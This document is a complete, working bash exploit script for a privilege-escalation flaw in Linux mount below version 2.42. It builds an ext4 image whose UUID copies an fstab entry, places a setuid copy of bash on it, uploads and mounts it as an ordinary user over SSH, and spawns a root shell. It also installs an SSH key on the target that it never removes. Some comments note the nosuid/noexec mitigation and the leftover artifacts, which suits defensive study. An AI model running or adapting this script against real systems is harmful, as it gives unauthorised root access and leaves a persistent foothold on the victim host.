
Mount less than 2.42 Duplicate UUID mask exploit code

#!/bin/bash
#
# oxagast
# marshall@oxasploits.com
#
# A Universally Ubiquitous ID plus an evil filesystem swap:
# A case study demonstrated in mount.
#
# sudo ./mount-under-2.42-0day-sploit.sh -u charlie -h 10.0.1.2 -k /home/attacker/.ssh/id_ed25519
# mount <= 2.41 exploit by oxagast
#
# [?] Checking for vulnerabilty...
# [!] Good, looks like the victim is vulnerable!
# [*] 10MB file gen...
# [*] Created mountpoint...
# [*] Created filesystem with UUID 116bf815-c476-4a78-a384-0169e828dcc5
# [*] Grabbing remote copy of /usr/bin/bash to use as payload on victim...
# [*] Payload copied to evil fs...  permissions updated...
# [*] Hey bby, why don't you come on over here and mount this...
# [*] Mounted evil fs on 10.0.1.2...
# [!] Spawning shell...
# whoami
# root
#
#
#######################################
# Print the banner, a usage line and a prose description of the fstab
# preconditions (an entry referenced by UUID with user,suid,exec semantics),
# then exit. Reached from the getopts default branch and from the
# missing -h/-u check below; it never returns.
# Globals:   none
# Arguments: none (uses $0 for the program name)
# Outputs:   help text on stdout
# Returns:   does not return; exits with status 1
#######################################
usage()
{
  echo "Linux mount <= 2.41 exploit by oxagast"
  echo
  echo "Usage: $0 -h 10.0.1.2 -u charlie"
  echo
  echo "For the HOST to be vulnerable it needs to have an /etc/fstab entry that"
  echo "uses a UUID to refer to the device, as well as having mount options"
  echo "equivilent to 'user,suid,exec'.  Access to the vulnerable host via"
  echo "ssh is also a requirement, though this was for ease of writing the"
  echo "exploit and not a true requirement for this to work."
  echo "A ext4 filesystem is created on a 10mb file with a UUID that is a duplicate"
  echo "of another UUID listed in /etc/fstab where user,suid,exec are required"
  echo "options (weather they are explicityly stated or implied), then"
  echo "/bin/bash is copied to the fs, where it's permissions are subsequently"
  echo "modified to include the suid bit set, the fs is dismounted and the resulting"
  echo "file is uploaded to the vuln box, where the file's filesystem with"
  echo "the cloned UUID is mounted in place of it's cloned UUID brother."
  echo "Mount doesn't check if the mount already exists as something else"
  echo "before letting you double up on the same mount point, and because user is"
  echo "specified, we can mount that fs as a user other than root,"
  echo "but still be able to execute the copy of bash sitting on the evil"
  echo "filesystem we created. This respects the suid bit setting because of fstab"
  echo "and executes the file as root, where a shell is waiting for us."
  exit 1
}
# Default private-key path. When it is still this value after option parsing,
# the script generates a fresh passwordless key pair instead of using one
# supplied with -k.
EK="exploit.key"
# -u user, -h host, -k private key. Any other flag, or a flag missing its
# argument, falls through to usage(), which exits 1.
while getopts ":h:u:k:" OP; do
  case "${OP}" in
    u)
      USERNAME=${OPTARG}
      ;;
    h)
      HOST=${OPTARG}
      ;;
    k)
      EK=${OPTARG}
      ;;
    *)
      usage
      ;;
  esac
done
shift $((OPTIND - 1))
# -h and -u are both mandatory.
if [ -z "${HOST}" ] || [ -z "${USERNAME}" ]; then
  usage
  exit 1
fi
echo "mount <= 2.41 exploit by oxagast"
echo
# Local root is required for the mkfs/mount/chmod steps further down.
if [[ $(id -u) != 0 ]]; then
  echo "[x] You need to run this locally as root!"
  exit 1
fi
# NOTE: removes exploit.key and exploit.key.pub from the current directory
# unconditionally, i.e. even when -k named a different key file.
rm -f exploit.key exploit.key.pub
# No key supplied: create a passwordless key pair and install its public half
# on the host via ssh-copy-id (the password prompt goes to the terminal; ssh
# output is discarded). Nothing later removes that authorized_keys entry on
# the host, so the added key is a persistent artifact to look for when
# reviewing a host this was run against.
if [[ $EK == "exploit.key" ]]; then
  echo "[*] Generating key..."
  ssh-keygen -f exploit.key -N "" >/dev/null
  echo "[*] Copying key..."
  echo "[?] Private key not specified, please enter SSH password..."
  ssh-copy-id -i exploit.key.pub -f ${USERNAME}@${HOST} 2>/dev/null >/dev/null
fi
# Reachability check: one non-interactive ssh; a non-zero status aborts.
echo "[?] Checking for vulnerabilty..."
if [[ $(
  ssh -i ${EK} ${USERNAME}@${HOST} true >/dev/null
  echo $?
) != 0 ]]; then
  echo "[x] Shit, Doesn't look like we have SSH access!"
  exit 1
fi
# Extract the UUID from the /etc/fstab line(s) that contain the substrings
# "user", "suid", "exec" and "UUID" (plain grep, so "nosuid"/"noexec" and
# commented lines also match at this stage). The two cut calls assume the
# "UUID=<value> " form with a space after the value.
VUUID=$(ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep user | grep suid | grep exec | grep UUID | cut -d '=' -f 2 | cut -d ' ' -f 1)
# Precondition check: the matched entry must not carry nosuid or noexec.
# Conversely, putting nosuid/noexec on every user-mountable fstab entry is the
# fstab-side mitigation this test looks for; "nosuid" alone is enough to make
# this script report the host as not vulnerable.
if [[ ${VUUID} != "" ]]; then
  if [[ $(ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep ${VUUID} | grep "nosuid\|noexec" | wc -l) > 0 ]]; then
    echo "[x] Drats, not vulnerable! nosuid or noexec present!"
    echo "[x] Enteries in /etc/fstab are:"
    ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep -v '#'
    exit 1
  fi
fi
# No entry satisfied the user/suid/exec/UUID filter above.
if [[ ${VUUID} == "" ]]; then
  echo "[x] Fuck, its not vulnerable!  Missing correct mount options or UUID reference."
  echo "[x] Enteries in /etc/fstab are:"
  ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep -v '#'
  exit 1
fi
echo "[!] Good, looks like the victim is vulnerable!"
# Mount point (second fstab field) of the entry whose UUID is duplicated; the
# payload is later run from this directory on the host.
MDIR=$(ssh -i ${EK} ${USERNAME}@${HOST} cat /etc/fstab | grep ${VUUID} | cut -d ' ' -f 2)
# Build the image locally: a 10M ext4 labelled "exploit" whose UUID is VUUID,
# mounted at ./expdir so a file can be placed in it.
fallocate -l 10M exploit
echo "[*] 10MB file gen..."
mkdir -p expdir
echo "[*] Created mountpoint..."
yes | mkfs.ext4 exploit -U ${VUUID} -L exploit 2>/dev/null >/dev/null
echo "[*] Created filesystem with UUID ${VUUID}"
mount exploit expdir/
# Reuse an existing ./payload if present; otherwise fetch the host's own
# /usr/bin/bash over scp.
if ! test -f "./payload"; then
  echo "[*] Grabbing remote copy of /usr/bin/bash to use as payload on victim..."
  scp -q -i ${EK} ${USERNAME}@${HOST}:/usr/bin/bash payload
fi
# Place the copy in the image as "bash" with the setuid/setgid bits set, then
# flush and unmount so the image file is consistent before upload.
cp ./payload expdir/bash
chmod a+s expdir/bash
echo "[*] Payload copied to evil fs...  permissions updated..."
sync
umount expdir
echo "[*] Hey bby, why don't you come on over here and mount this..."
# Upload the image to the user's home directory on the host as "exploit" and
# ask the host to mount it by that path; the usage text above describes why
# the duplicated UUID lets a non-root user do this.
scp -q -i ${EK} exploit ${USERNAME}@${HOST}:
ssh -i ${EK} ${USERNAME}@${HOST} mount exploit
echo "[*] Mounted evil fs on ${HOST}..."
echo "[!] Spawning shell..."
sleep 1
echo "whoami"
# Success is judged by running the mounted bash and reading back whoami.
WHO=$(ssh -i ${EK} ${USERNAME}@${HOST} ${MDIR}/bash -p -c whoami)
echo ${WHO}
if [[ ${WHO} -eq "root" ]]; then
  ssh -i ${EK} ${USERNAME}@${HOST} ${MDIR}/bash -p # boom
else
  echo "[x] Oof. Exploit failed! Sorry!"
fi
# Remote cleanup only unmounts MDIR: the uploaded "exploit" image stays in the
# user's home directory and the authorized key added earlier is left in place.
# Both are artifacts a host review should look for.
ssh -i ${EK} ${USERNAME}@${HOST} umount ${MDIR}
echo "[*] Cleaning up local files..."
# Local cleanup uses relative paths in the current working directory.
rm -rf exploit expdir
rm -f exploit.key exploit.key.pub payload